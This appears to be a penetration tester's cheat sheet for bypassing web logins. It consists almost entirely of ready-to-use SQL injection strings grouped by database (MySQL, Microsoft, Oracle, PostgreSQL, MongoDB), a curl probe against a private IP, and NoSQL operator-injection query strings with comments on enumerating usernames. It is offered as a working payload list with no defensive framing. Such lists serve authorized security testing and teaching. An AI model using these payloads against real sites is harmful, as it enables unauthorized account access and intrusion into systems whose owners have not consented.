Login bypass
#With curl
#Use -I flag
curl -I "http://192.168.101.105/item/viewItem.php?id=5"
#Try:
whatever' or '1'='1
' or '1'='1
-----------------------------------
#Microsoft, Oracle, PostgreSQL
admin'--
admin' or 1=1--
admin' or '1'='1'--
admin}" or 1=1--
----------------------------------
#MongoDB specific Injection
' || 1==1 %00
admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1
----------------------------------
#MySQL
admin'-- -
admin'#
admin' or 1=1#
admin' or 1=1-- -
admin' or '1'='1'-- -
admin' or '1'='1'#
admin}" or 1=1-- -
----------------------------------
#Extra stuff
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
----------------------------
Operators
# $ne: Not equal
username[$ne]=xyz&password[$ne]=xyz
# $regex: Regular expressions
username[$regex]=.*&password[$regex]=.*
username[$regex]=^xyz&password[$regex]=^xyz
username[$regex]=^a.*$&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values
# $exists: Exists in the database
username[$exists]=true&password[$exists]=true
# $nin: Not in (value is not in the given list)
username[$nin][admin]=admin&password[$ne]=xyz
# If we find that "admin" exists, we can exclude it by using the $nin operator.
username[$nin][]=admin&password[$ne]=xyz
# If more users are found, exclude each of them in the same way.
username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz
# $gt: Greater than
username[$gt]=s&password[$gt]=s
# $lt: Less than
username[$lt]=s&password[$lt]=s
# Combinations
username[$ne]=xyz&password[$regex]=.*
username[$exists]=true&password[$ne]=xyz
username[$ne]=xyz&password[$exists]=true
username[$regex]=.*&password[$ne]=xyz
username[$ne]=xyz&password[$regex]=.*
username[$regex]=.{6}&password[$ne]=xyz